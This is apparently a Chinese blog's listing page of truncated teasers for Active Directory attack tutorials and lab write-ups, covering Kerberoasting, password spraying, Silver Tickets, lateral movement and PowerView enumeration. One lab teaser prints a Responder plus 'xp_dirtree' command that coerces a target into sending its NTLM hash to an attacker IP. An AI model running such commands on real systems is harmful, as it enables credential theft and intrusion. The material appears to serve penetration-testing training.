排序
对 Active Directory 身份验证执行攻击3 Kerberoasting
回想一下 Kerberos 协议是如何工作的。我们知道,当用户想要访问由服务主体名称 (SPN)托管的资源时,客户端会请求由域控制器生成的服务票证。然后,服务票证由应用程序服务器解密和验证,因为它...
对 Active Directory 身份验证执行攻击1 密码喷射
1. 密码攻击在探索这些攻击之前,我们需要考虑一个重要的因素。在执行暴力或单词列表身份验证攻击时,我们必须注意帐户锁定。登录失败次数过多可能会阻止帐户遭受进一步的攻击,并可能向系统管...
对 Active Directory 身份验证执行攻击4 Silver Tickets
在对 Active Directory 身份验证执行攻击3中,我们获取并破解了 TGS-REP 哈希以检索 SPN 的明文密码。我们将更进一步,伪造我们自己的服务票证。 Kerberos 身份验证的内部工作原理,在服务帐户...
Shadow Copies
shadow copy 也被称作 Volume Shadow Service (VSS)是一种 Microsoft 备份技术,允许创建文件或整个卷的快照。为了管理卷影副本,Microsoft 签名的二进制文件 vshadow.exe作为Windows SDK 的...
枚举域共享
我 们 将 使 用 PowerView 的 Find-DomainShare 功 能 来 查 找 域 中 的 共 享 。 我 们 还 可 以 添 加 -CheckShareAccess 标志来显示仅供我们使用的共享。但是,我们现在将跳过此标志以返回...
Medtech 堡垒机 seimpersonateprivilege 提权
靶场信息外网三台主机地址 1. 漏洞挖掘与利用扫描VM4gobuster vm4sqlmap注入可以爆破 先尝试能不能拿到NTLMhash先监听接口responder -I tun0exec master..xp_dirtree '\\192.168.45.229\test'...
Active Directory 中的横向移动1 WMI 和 WinRM
我们方法中合乎逻辑的下一步是破解我们获得的任何密码哈希值,并使用明文密码对计算机进行身份验证,以获得未经授权的访问。然而,密码破解需要时间并且可能会失败。此外,Kerberos和 NTLM 不直...
Active Directory 中的横向移动5 DCOM
我们将检查一种相当新的横向移动技术,该技术利用分布式组件对象模型 (DCOM)Microsoft 组件对象模型 (COM)是一个用于创建相互交互的软件组件的系统。虽然 COM 是为同进程或跨进程交互而创建的,...
AD Enumeration with PowerView
PowerView脚本#requires -version 2 <# PowerSploit File: PowerView.ps1 Author: Will Schroeder (@harmj0y) License: BSD 3-Clause Required Dependencies: None #> ##################...
通过服务主体名称进行枚举
独立应用程序可以使用一组预定义的服务帐户,例如LocalSystem、LocalService、和 NetworkService。对于更复杂的应用程序,可以使用域用户帐户来提供所需的上下文,同时仍然保持对域内资源的访问...